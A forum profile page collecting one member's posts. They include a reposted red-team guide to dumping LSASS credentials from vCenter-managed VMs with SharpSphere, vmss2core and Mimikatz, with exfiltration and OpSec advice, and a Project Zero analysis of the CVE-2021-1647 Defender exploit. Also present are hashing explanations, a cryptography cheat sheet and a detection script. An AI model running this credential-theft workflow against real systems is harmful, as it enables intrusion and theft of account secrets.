Everything posted by Nytro
-
Dumping LSASS with SharpSphere

The dump function of SharpSphere allows operators to dump LSASS from any powered-on VM managed by vCenter or ESXi, without needing to authenticate to the guest OS and without needing VMware Tools to be installed. This technique is not new and has been around for many years:

https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-6-vmware-workstation/
https://web.archive.org/web/20210204072538/https://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/

although until now it has been very difficult to leverage operationally. At its core, the process is:

1. Authenticate to vCenter/ESXi.
2. Create a snapshot, with memory, of a powered-on target VM.
3. Download the (often very large) .vmem and .vmsn files from the datastore.
4. Either run them through Volatility, or convert them to a .dmp with vmss2core and run it through WinDbg with Mimikatz.

Arguments

Z:\>SharpSphere.exe dump --help
SharpSphere 1.0.0.0
Copyright © 2020

  --url            Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk
  --username       Required. vCenter username, i.e. administrator@vsphere.local
  --password       Required. vCenter password
  --targetvm       Required. VM to snapshot
  --snapshot       (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from the last existing snapshot, or none if no snapshots are available.
  --destination    Required. Full path to the local directory where the file should be downloaded
  --help           Display this help screen.
  --version        Display version information.

--snapshot

By default, SharpSphere will not attempt to create a snapshot and will instead attempt to find valid .vmem and .vmsn files from an existing snapshot. This is preferable from an OpSec perspective because there will be no evidence in the UI; however, it is obviously not guaranteed that a particular target VM has any snapshots, or that those snapshots also captured the VM's memory (a snapshot taken without memory has no .vmem file). If no existing snapshot exists then SharpSphere will exit.

With --snapshot specified, SharpSphere will create a snapshot called System Backup [TIMESTAMP], download its associated .vmem and .vmsn files, and then delete the snapshot once finished. Both the creation and deletion of the snapshot will be seen by other users in the Recent Tasks window, and both are recorded as tasks against the VM. It is possible to attempt the dump without --snapshot first to see if existing snapshots exist, and then repeat with --snapshot specified if none exist.

--destination

SharpSphere needs to download two files from the snapshot: a large .vmem file that is equal in size to the amount of RAM assigned to the machine (i.e. 4GB, 8GB, 16GB etc.), and a much smaller .vmsn file. It downloads these files to the directory specified by --destination on the executing machine. When running through Cobalt Strike's execute-assembly this is obviously a directory on the beacon machine's filesystem. This is an important distinction to make because your target user is likely on an internal network, so the download from the datastore should be relatively quick, as opposed to having to pull these files over your beacon's proxy.

Once the two files are downloaded, SharpSphere adds both to a zip file with a random name and then deletes them. This makes the resultant file marginally easier to exfiltrate; for example, during testing a 4GB .vmem file resulted in an 800MB zip.

Instructions

Execute SharpSphere with the following arguments (hint: get the VM name with list):

SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]

Example Output

C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public"
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Finding existing snapshots for Windows 10...
Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set

If no snapshots exist, repeat the same command and include --snapshot:

SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Creating snapshot for VM Windows 10...
[x] Snapshot created successfully
[x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz...
[x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv...
[x] Download complete, zipping up so it's easier to exfiltrate...
[x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz
[x] Deleting the snapshot we created

If your C2 infrastructure and bandwidth support it, download the resultant zip to your attacker-controlled machine. Alternatively, and less OpSec-safe, upload the necessary tools to the beacon machine, with the understanding that these tools may be flagged as suspicious. The rest of the instructions assume you have managed to get the file back to your machine.

Rename the random file, in this instance cec0kwgk.b2m, to a .zip file and then extract the two files. The larger one is your .vmem file. Download vmss2core and provide it first with the smaller .vmsn file and then the larger .vmem file.

If the target VM is Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 then execute with -W8:

vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz

Otherwise use -W:

vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz

Download WinDbg and load the resultant .dmp file that vmss2core generated as a Crash Dump. Download Mimikatz and load mimilib.dll from within WinDbg:

.load C:\Tools\Mimikatz\x64\mimilib.dll

Find the LSASS process:

!process 0 0 lsass.exe

Switch to that process (the address is the EPROCESS pointer printed by the previous command):

.process /r /p ffffc70462d020c0

Profit:

!mimikatz

Written on February 26, 2021
Source: https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/
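The detection-side counterpart of the workflow above, added here as an example and not part of the original post or of SharpSphere: the tool leaves a memory snapshot that is created and then removed minutes later, by default named "System Backup [TIMESTAMP]". The script below runs that rule over a constructed list of vCenter task records. The record field names are an assumption made for the example (they are not vCenter's real export schema); the task names CreateSnapshot_Task and RemoveSnapshot_Task are the vSphere API method names.

```python
import re
from datetime import datetime

# Constructed sample records modelled on a vCenter task export. The dict keys
# (time, user, vm, task, name, memory) are assumptions for this example only.
SAMPLE_TASKS = [
    {"time": "2021-02-26T10:00:05", "user": "administrator@vsphere.local", "vm": "Windows 10",
     "task": "CreateSnapshot_Task", "name": "System Backup 26/02/2021 10:00:04", "memory": True},
    {"time": "2021-02-26T10:04:40", "user": "administrator@vsphere.local", "vm": "Windows 10",
     "task": "RemoveSnapshot_Task", "name": "System Backup 26/02/2021 10:00:04", "memory": None},
    # Backup software: snapshot without memory, so no .vmem is ever written.
    {"time": "2021-02-26T11:00:00", "user": "backup-svc@vsphere.local", "vm": "FileServer",
     "task": "CreateSnapshot_Task", "name": "veeam-pre-backup", "memory": False},
    {"time": "2021-02-26T11:30:00", "user": "backup-svc@vsphere.local", "vm": "FileServer",
     "task": "RemoveSnapshot_Task", "name": "veeam-pre-backup", "memory": None},
    # Manual checkpoint with memory that is kept around: not flagged.
    {"time": "2021-02-26T12:00:00", "user": "ops@vsphere.local", "vm": "DC01",
     "task": "CreateSnapshot_Task", "name": "before patching", "memory": True},
]

# SharpSphere's default snapshot name prefix when run with --snapshot.
DEFAULT_NAME = re.compile(r"^System Backup ")


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def find_short_lived_memory_snapshots(tasks, max_lifetime_seconds=3600):
    """Flag snapshots taken WITH memory that were removed within max_lifetime_seconds.

    A memory snapshot is what produces the .vmem file an attacker needs, and deleting
    it shortly afterwards is the clean-up step. Backup tooling normally snapshots
    without memory, and human checkpoints are normally kept, so the combination is rare.
    """
    pending = {}   # (vm, snapshot name) -> the create record still awaiting removal
    findings = []
    for rec in sorted(tasks, key=lambda r: r["time"]):
        key = (rec["vm"], rec["name"])
        if rec["task"] == "CreateSnapshot_Task" and rec.get("memory"):
            pending[key] = rec
        elif rec["task"] == "RemoveSnapshot_Task" and key in pending:
            created = pending.pop(key)
            lifetime = (_ts(rec["time"]) - _ts(created["time"])).total_seconds()
            if lifetime <= max_lifetime_seconds:
                findings.append({
                    "vm": rec["vm"],
                    "user": created["user"],
                    "snapshot": rec["name"],
                    "lifetime_seconds": lifetime,
                    "matches_default_name": bool(DEFAULT_NAME.match(rec["name"])),
                })
    return findings


if __name__ == "__main__":
    for hit in find_short_lived_memory_snapshots(SAMPLE_TASKS):
        print(f"[!] {hit['vm']}: memory snapshot '{hit['snapshot']}' by {hit['user']} "
              f"lived {hit['lifetime_seconds']:.0f}s"
              + (" (SharpSphere default name)" if hit["matches_default_name"] else ""))
```

The name match is only a hint, since an operator can rename the snapshot; the durable signal is the memory snapshot followed by a quick removal, which is worth correlating with datastore downloads of .vmem files by the same account.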
-
CVE-2021-1647: Windows Defender mpengine remote code execution
Maddie Stone

The Basics

Disclosure or Patch Date: 12 January 2021
Product: Microsoft Windows Defender
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647
Affected Versions: Version 1.1.17600.5 and previous
First Patched Version: Version 1.1.17700.4
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): Anonymous

The Code

Proof-of-concept:
Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788
Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Heap buffer overflow

Vulnerability details: There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table while unpacking an ASProtect-packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks whether the next section entry's address is lower than the previous one, not whether they are equal. This means that with a section table such as the one used in this exploit sample, [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when the code sees the next entry at 0x2000 it simply skips over it without exiting or updating the size of the section. 0x3000 bytes are then copied into that section during decompression, leading to the heap buffer overflow.

if ( next_sect_addr > sect_addr )  // current va is greater than prev (not also eq)
{
    sect_addr = next_sect_addr;
    sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000;
}
// if next_sect_addr <= sect_addr we continue on to next entry in the table
[...]
new_sect_alloc = operator new[](sect_sz + sect_addr);  // allocate new section
[...]
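A model of the check above and of its hardened form, added here as an example; this is not mpengine's code, it only reproduces the allocation rule shown in the snippet (operator new[](sect_sz + sect_addr)) and assumes the decompressor then writes each entry's size bytes at its address. The initial previous-address value is also an assumption chosen so the first entry is always accepted.

```python
# Section table from the exploit sample, as given in the RCA: (virtual address, size).
SAMPLE_SECTION_TABLE = [(0x0, 0x0), (0x0, 0x0), (0x2000, 0x0), (0x2000, 0x3000)]

PAGE_MASK = 0xFFFFF000


def _round_up_to_page(size: int) -> int:
    """Mirror of (next_sect_sz + 0xFFF) & 0xFFFFF000 in the vulnerable function."""
    return (size + 0xFFF) & PAGE_MASK


def process_section_table(table, patched: bool):
    """Model the section loop and the copy that follows it.

    Vulnerable (patched=False): an entry whose address is not strictly greater than
    the previous one is silently skipped, so the buffer is never grown for it, yet
    its `size` bytes are still written at `addr`.
    Patched (patched=True): that same entry makes the unpacker bail out instead.

    Returns (capacity, overflows) where overflows lists (addr, size, bytes_past_end).
    """
    prev_addr = -1      # assumption: the first entry is always accepted
    capacity = 0        # bytes obtained from operator new[](sect_sz + sect_addr)
    overflows = []
    for addr, size in table:
        if addr > prev_addr:
            prev_addr = addr
            capacity = addr + _round_up_to_page(size)
        elif patched:
            raise ValueError(f"section address {addr:#x} is not above previous {prev_addr:#x}")
        # Decompression writes `size` bytes at `addr` into the current buffer.
        if addr + size > capacity:
            overflows.append((addr, size, addr + size - capacity))
    return capacity, overflows


if __name__ == "__main__":
    cap, bad = process_section_table(SAMPLE_SECTION_TABLE, patched=False)
    for addr, size, excess in bad:
        print(f"vulnerable: writing {size:#x} bytes at {addr:#x} into a {cap:#x}-byte buffer "
              f"overflows by {excess:#x} bytes")
    try:
        process_section_table(SAMPLE_SECTION_TABLE, patched=True)
    except ValueError as err:
        print(f"patched: rejected ({err})")
```

Run against the sample table, the vulnerable path accepts (0x2000, 0), allocates nothing beyond address 0x2000, skips the duplicate (0x2000, 0x3000) and then writes 0x3000 bytes past the end; the patched path rejects the table at the first repeated address.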
Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison, so that if any entry in the section array has an address less than or equal to the previous entry, the code errors out and exits rather than continuing to decompress.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing and review.

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

1. The heap buffer overflow is used to overwrite the data in an object stored as the first field of the lfind_switch object, which is allocated in the lfind_switch::switch_out function.
2. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Because there is no bounds checking on these indices, another out-of-bounds write can occur.
3. The out-of-bounds write in step 2 performs an OR operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table tracking the virtually mapped pages. This field usually equals the number of pages mapped * 2. By performing the OR operations, the value in that field is increased (for example from 0x0000000C to 0x0003030C). Once it is increased, it allows for an additional out-of-bounds read and write, used for modifying the memory management struct to obtain arbitrary read/write.

Exploit flow: The exploit uses "primitive bootstrapping": the original buffer overflow is used to cause two additional out-of-bounds writes, ultimately gaining arbitrary read/write.

Known cases of the same exploit flow: Unknown.

Part of an exploit chain? Unknown.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):
- Review the ASProtect unpacker for additional parsing bugs.
- Review and/or fuzz other unpacking code for parsing and memory issues.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:
- Building mpengine.dll with ASAN enabled should allow this bug class to be caught.
- Open-sourcing the unpackers could allow more people to find issues in this code, which could potentially surface issues like this more readily.

Ideas to mitigate the exploit flow:
- Add bounds checking anywhere indices are used. For example, if there had been bounds checking on the indices used in lfind_switch::switch_in, it would have prevented the second out-of-bounds write which allowed this exploit to modify the VMM_context_t structure.

Other potential improvements:
- It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, Microsoft published an article stating that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default would make this vulnerability more difficult to exploit, because a sandbox escape would then be required in addition to this vulnerability.

0-day detection methods

What are potential detection methods for similar 0-days? Meaning, are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Detecting these types of 0-days will be difficult, because the sample simply drops a new file with the characteristics needed to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out.

Other References

February 2021: 浅析 CVE-2021-1647 的漏洞利用技巧 ("Analysis of CVE-2021-1647 vulnerability exploitation techniques") by Threatbook

Source: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html
-
Don't forget: weekend, CTF, prizes! https://ctf.rstforums.com/ If anyone else can contribute exercises, not very difficult ones, that's perfect.
-
I booked my appointment at Romexpo when there were still 3000 people on the waiting list. And I think after about 2 weeks I was able to get a slot.
-
I'm not preparing to give any order, you're lying to people openly. As for losing the belly, I keep trying but I can't manage it... Maybe those who give the order can also give me some advice on how to get rid of the belly.
-
Hi, SHA256/SHA512 etc. cannot be reversed because they are hashing algorithms. For example, a sha256 hash of the text "Gigel" will be 38810d5f65b12d1433aaff068818bc1f298a322b2a45a8f335645c8fe3af3510. The (Romanian) text "Gigel se duce la plimbare si vede o fata de care se indragosteste apoi uita de ea cand vede un Lamborghini si gaseste 10 RON pe jos" ("Gigel goes for a walk and sees a girl he falls in love with, then forgets about her when he sees a Lamborghini and finds 10 RON on the ground") will have the following hash: 299c91444f0f7f8ee3cf12ffc4a9483bc1caf5f43f68b0593b1dddd84a0b44be. As you can see, regardless of the length of the text, the length of the hash is the same. Even if the text (or binary) is 1 KB or 2 TB, a hash will have the same length and will always be the same for the same input. That's why they are used, so that passwords are not stored in plain text in the database. To take a simpler example: the CNP (personal numeric code). It contains the sex, the date of birth, the county... and the last digit is a "checksum". The exact algorithm is described here: https://ro.wikipedia.org/wiki/Cod_numeric_personal_(România) - that's how that last digit is computed. But let's take a simpler example, let's say that for the CNP 1881111111116 the checksum is the digit "6" at the end and that it is computed just by adding up the digits and taking the remainder of the division by 10 (i.e. %10). A hash, as an idea, is something similar. A hash actually represents that "6" at the end. Can you deduce the CNP from that 6? It's pretty clear that you can't. The only thing that can be done with hashes is brute force, which can be optimized because of some "problems" in the hash algorithms. That is, you try to hash every combination of text: aaaaaa, aaaaab, aaaaac etc. until you reach the desired hash. The discussion could go on.
-
CRYPTOGRAPHY CHEAT SHEET FOR BEGINNERS

1 What is cryptography?

Cryptography is a collection of techniques for:
- concealing data transmitted over insecure channels
- validating message integrity and authenticity

2 Some cryptographic terms

plaintext – a message or other data in readable form
ciphertext – a message concealed for transmission or storage
encryption – transforming plaintext into ciphertext
decryption – transforming ciphertext back into plaintext
key – an input to an encryption or decryption algorithm that determines the specific transformation applied
hash – the output of an algorithm that produces a fixed N-bit output from any input of any size
entropy – the number of possible states of a system, or the number of bits in the shortest possible description of a quantity of data. This may be less than the size of the data if it is highly redundant.

3 Basic cryptographic algorithms

3.1 symmetric ciphers

A symmetric cipher uses the same key for encryption and decryption. In semi-mathematical terms:

encryption: ciphertext = E(plaintext, key)
decryption: plaintext = D(ciphertext, key)

Two parties that want to communicate via encryption must agree on a particular key to use, and sharing and protecting that key is often the most difficult part of protecting encryption security. The number of possible keys should be large enough that a third party can't feasibly try all of the keys ("brute-forcing") to see if one of them decrypts a message.

3.2 block ciphers

A block cipher works on fixed-size units of plaintext to produce (usually) identically-sized units of ciphertext, or vice versa.
Example block ciphers:
- DES (the former Data Encryption Standard) with a 64-bit block and 56-bit keys, now obsolete: the key size is small enough for brute-forcing and the block size is small enough that repeated blocks become likely in large volumes of data.
- AES (Advanced Encryption Standard, formerly known as Rijndael) with 128-bit blocks and keys of 128, 192, or 256 bits.

3.3 stream ciphers

A stream cipher produces a stream of pseudo-random bits from a key (and usually a nonce) that can be combined (usually using XOR) with data for encryption or decryption. Because XOR is its own inverse, the same keystream decrypts what it encrypted, so a keystream must never be reused for two messages.

Example stream ciphers:
- ChaCha20
- RC4 (now considered too weak to use)

3.4 public-key (or asymmetric) ciphers

A public-key cipher has two complementary keys K1 and K2 such that one can reverse what the other one does, or in symbolic terms:

ciphertext = E(plaintext, K1) or E(plaintext, K2)
plaintext = D(ciphertext, K2) or D(ciphertext, K1)

Unlike a symmetric cipher, where the key must be kept secret between parties at all times, a public-key algorithm allows one (but only one!) of the keys to be revealed in public, making it possible to send encrypted messages without having previously arranged to share a key.

Example public-key algorithms:
- RSA (from the initials of its creators Rivest, Shamir, Adleman), based on modular arithmetic using large prime numbers and the difficulty of factoring large numbers. At this time 2048-bit keys (moduli) are considered necessary for secure RSA: 512-bit and 768-bit keys have already been factored, and factoring 1024-bit keys appears feasible for a well-funded attacker.
- Elliptic curve algorithms, based on integers and modular arithmetic satisfying an equation of the form y^2 = x^3 + a*x + b. Elliptic curve keys can be much shorter (256-bit EC keys are considered roughly equivalent to 3072-bit RSA keys).

However, public-key algorithms are much (hundreds to thousands of times) slower than symmetric algorithms, making it expensive to send large amounts of data using only public-key encryption.
However, public-key algorithms do provide a secure way to transmit symmetric cipher keys.

3.5 Diffie-Hellman key exchange

An algorithm that allows two parties to create a shared secret through a public exchange from which an eavesdropper cannot feasibly infer the secret. Useful for establishing a shared symmetric key for encrypted communication. Diffie-Hellman can be performed using either modular arithmetic with large prime numbers or elliptic-curve groups. Note that plain Diffie-Hellman only protects against a passive eavesdropper; an active attacker can sit in the middle and run two exchanges, so the exchange must be authenticated (for example with a signature, as TLS does).

Diffie-Hellman is also usually the basis of "forward secrecy". One method of key exchange possible in SSL/TLS is simply using a public-key algorithm to send a key between a client and a server. However, if the private key of that SSL/TLS certificate is later exposed, someone who monitored and recorded session traffic could decrypt all the keys used in the sessions they recorded. Forward secrecy not only involves setting up unique, random session keys for each communication session, but also using an algorithm like Diffie-Hellman with fresh (ephemeral) values per session, which establishes those keys in a way that is inaccessible to an eavesdropper even if the long-term private key later leaks.

3.6 hash algorithms

A hash (or cryptographic checksum) reduces input data (of any size) to a fixed-size N-bit value. In particular, for cryptographic use a hash has these properties:
- two different inputs are very unlikely to produce the same hash (a "collision")
- it should be very difficult to find an input that produces any specified hash value (a "preimage"), or a second input that hashes to the same value as a given one
- even a one-bit change in the input should produce a hash that is different in about N/2 bits

Note that because the number of possible inputs to a hash function is much larger than the number of outputs, collisions and preimages always exist; the question is only how much work they take to find. In the ideal case, for an N-bit hash, two random inputs collide with probability 2^-N, but finding some collision among many random inputs is expected to take only about 2^(N/2) attempts (look up the "birthday problem" for why it is N/2 and not N), while finding an input that produces a specified hash value is expected to take about 2^N attempts.
Example hash algorithms:
- MD5 produces a 128-bit hash from its input. Practical collisions (including chosen-prefix collisions) have been demonstrated and it should not be used for any security purpose.
- SHA-1 produces 160-bit hashes but has at least one demonstrated collision and is deprecated for cryptographic use (however, it is still used in git as a content identifier because it is still workable as a plain hash function).
- SHA-256 produces 256-bit hashes. SHA-224 is basically a SHA-256 variant truncated to 224 bits. Similarly, SHA-512 produces a 512-bit hash and SHA-384 is a SHA-512 variant truncated to 384 bits.

3.7 cryptographic random number generators

Many cryptographic methods require producing random numbers (such as for generating unique keys or identifiers). Traditional pseudo-random number generators produce output that can be highly predictable, as well as often starting from known states and having relatively small periods (such as 2^32). A cryptographic random number generator must make it very difficult to determine the prior (or future) state of the generator from its current output, as well as have enough entropy to generate sufficiently large random numbers.

In 2008 it was discovered that the Debian maintainers had made a seemingly innocuous patch to the OpenSSL random number generator initialization. The unintended consequence was that it effectively seeded the generator with only about 15-16 bits of entropy (essentially the process ID), meaning that in particular ssh-keygen generated only about 2^16 possible 2048-bit SSH host keys when it really should have been capable of generating well over 2^2000. Once this was discovered and patched a lot of people had to change their host keys (or risk "man-in-the-middle" impersonation attacks).

Finding useful random input to make a cryptographic random number generator truly unpredictable can be difficult. Many systems attempt to collect physically random input (such as the timing of disk I/O, network packets, or keyboard input) that is "mixed" into the existing random state using a cipher or cryptographic hash.
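The hash properties from 3.6, and the "only brute force works" point made in the earlier reply about SHA-256 and the CNP check digit, in running code. This is an added example and not part of the cheat sheet: it uses Python's hashlib, and to make the collision and preimage searches finish in well under a second it deliberately truncates SHA-256 to 16 bits (a toy hash; the expected costs are then about 2^8 attempts for a collision and about 2^16 for a preimage). The input strings are constructed for the example.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Fixed 256-bit (64 hex digit) output regardless of input size."""
    return hashlib.sha256(data).hexdigest()


def hamming_distance_bits(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche_bits(data: bytes, bit_index: int = 0) -> int:
    """Flip a single input bit and count how many of the 256 output bits change.
    For a good hash this is about N/2 = 128 (binomially distributed around it)."""
    flipped = bytearray(data)
    flipped[bit_index // 8] ^= 1 << (bit_index % 8)
    return hamming_distance_bits(hashlib.sha256(data).digest(),
                                 hashlib.sha256(bytes(flipped)).digest())


def truncated_hash(data: bytes, bits: int) -> int:
    """A deliberately weak N-bit hash: the first `bits` bits of SHA-256."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") >> (256 - bits)


def find_collision(bits: int):
    """Birthday search: hash counter-derived inputs until two share an output.
    Expected work ~2^(bits/2); guaranteed to succeed within 2^bits + 1 inputs
    by the pigeonhole principle. Returns (attempts, input_a, input_b)."""
    seen = {}
    for i in range(2 ** bits + 1):
        msg = f"msg-{i}".encode()
        h = truncated_hash(msg, bits)
        if h in seen:
            return i + 1, seen[h], msg
        seen[h] = msg
    raise AssertionError("unreachable: pigeonhole guarantees a collision")


def find_preimage(target: int, bits: int, limit: int):
    """Brute force: try inputs until one hashes to `target`.
    Expected work ~2^bits, the square of the collision cost.
    Returns (attempts, input) or None if `limit` inputs were tried without a hit."""
    for i in range(limit):
        msg = f"candidate-{i}".encode()
        if truncated_hash(msg, bits) == target:
            return i + 1, msg
    return None


if __name__ == "__main__":
    print("sha256('Gigel')          =", sha256_hex(b"Gigel"))
    print("sha256(1 MB of 'x')      =", sha256_hex(b"x" * 1_000_000))
    print("bits changed by 1-bit flip:", avalanche_bits(b"Gigel"), "of 256")
    attempts, a, b = find_collision(16)
    print(f"16-bit collision after {attempts} inputs: {a!r} and {b!r}")
    target = truncated_hash(b"candidate-12345", 16)   # a value we know has a preimage
    attempts, hit = find_preimage(target, 16, limit=20_000)
    print(f"16-bit preimage after {attempts} inputs: {hit!r}")
```

For a real 256-bit hash the same two searches cost about 2^128 and 2^256 operations respectively, which is why "reversing" SHA-256 in the sense of the forum question is not a thing; password cracking succeeds only because the input space (human-chosen passwords) is tiny, not because the hash is inverted.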
4 Cryptographic Protocols

The algorithms described above are building blocks for methods of secure communication. A particular combination of these basic algorithms applied in a particular way is a cryptographic protocol.

4.1 cipher modes

The simplest thing you can do with a block cipher is break plaintext up into blocks, then encrypt each block with your chosen key (also called ECB for "Electronic Code Book", by analogy with codes that simply substituted code words). Unfortunately this leads to a weakness: if a particular plaintext block is repeated in the input, the ciphertext block also repeats in the output. This can easily happen in English text if a phrase just happens to line up with a block the same way more than once, and it is glaring in structured data such as images or database records.

There are other ways to use block ciphers to avoid this. The simplest is CBC or "Cipher Block Chaining", where the previous ciphertext block is XORed with the current plaintext block before encrypting it. This is reversible by decrypting a ciphertext block, then XORing the previous ciphertext block with the result to recover the plaintext. There are other modes like CTR ("Counter") and OFB ("Output FeedBack") that combine ciphertext and plaintext in more complicated but reversible ways so that repeated plaintext blocks won't result in repeated ciphertext blocks. These modes also depend on an "initialization vector" (or nonce), which is typically a cryptographically random value that makes the initial state of the encryption unpredictable to an outside observer; for CBC the IV must be unpredictable, and for CTR the nonce must never be reused with the same key. None of these modes by themselves detect tampering with the ciphertext; that needs a MAC or an authenticated mode such as AES-GCM.

4.2 message signing

Someone who has created a public key pair (K1, K2) and published a public key (let's say that's K2) can transform a message using their private key K1, and anyone can validate that the message came from that sender by reversing the transformation with the public key K2. (This is the textbook description of RSA signatures, where the signing operation looks like "encrypting with the private key"; real signature schemes such as RSA-PSS or ECDSA add padding or use different mathematics, but the trust model is the same.) Due to the much higher computational cost of public-key operations, the signer actually signs only a cryptographic hash of the original message.
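ECB versus CBC from 4.1, shown on a plaintext with repeated blocks. This is an added example, not code from the cheat sheet. Because the example must run without third-party libraries, the block cipher is a toy 4-round Feistel network whose round function is HMAC-SHA256 (a construction that is a valid permutation, so it decrypts correctly, but is here only to illustrate modes; use AES in practice). The key, IV and plaintext are constructed for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16   # 128-bit blocks, like AES

# Constructed sample plaintext: four 16-byte blocks, the first three identical.
SAMPLE_PLAINTEXT = b"ATTACK AT DAWN!!" * 3 + b"THEN RETREAT!!!!"


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_function(key: bytes, rnd: int, half: bytes) -> bytes:
    """Keyed PRF for one Feistel round: HMAC-SHA256 truncated to half a block."""
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def encrypt_block(key: bytes, block: bytes, rounds: int = 4) -> bytes:
    """Toy block cipher (Feistel network). (L, R) -> (R, L xor F(R)) per round."""
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(rounds):
        left, right = right, _xor(left, _round_function(key, rnd, right))
    return left + right


def decrypt_block(key: bytes, block: bytes, rounds: int = 4) -> bytes:
    """Inverse of encrypt_block: run the rounds backwards."""
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(rounds)):
        left, right = _xor(right, _round_function(key, rnd, left)), left
    return left + right


def _blocks(data: bytes):
    if len(data) % BLOCK:
        raise ValueError("this example expects input padded to a multiple of the block size")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """ECB: each block encrypted independently, so equal plaintext blocks leak as equal ciphertext blocks."""
    return b"".join(encrypt_block(key, p) for p in _blocks(plaintext))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC: C[i] = E(P[i] xor C[i-1]) with C[-1] = IV."""
    prev, out = iv, []
    for p in _blocks(plaintext):
        prev = encrypt_block(key, _xor(p, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """CBC inverse: P[i] = D(C[i]) xor C[i-1]."""
    prev, out = iv, []
    for c in _blocks(ciphertext):
        out.append(_xor(decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def repeated_blocks(ciphertext: bytes) -> int:
    """How many ciphertext blocks are duplicates of an earlier block."""
    chunks = _blocks(ciphertext)
    return len(chunks) - len(set(chunks))


if __name__ == "__main__":
    key = os.urandom(BLOCK)
    iv = os.urandom(BLOCK)          # CBC needs a fresh, unpredictable IV per message
    print("ECB repeated blocks:", repeated_blocks(ecb_encrypt(key, SAMPLE_PLAINTEXT)))
    print("CBC repeated blocks:", repeated_blocks(cbc_encrypt(key, iv, SAMPLE_PLAINTEXT)))
```

With three identical plaintext blocks, ECB yields two repeated ciphertext blocks (the pattern of the data is visible without knowing the key), while CBC chains each block into the next so the ciphertext shows no repetition.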
A sender can also send a plaintext message along with a signature created with their private key if the privacy of the message is not important but validating the identity of the sender is.

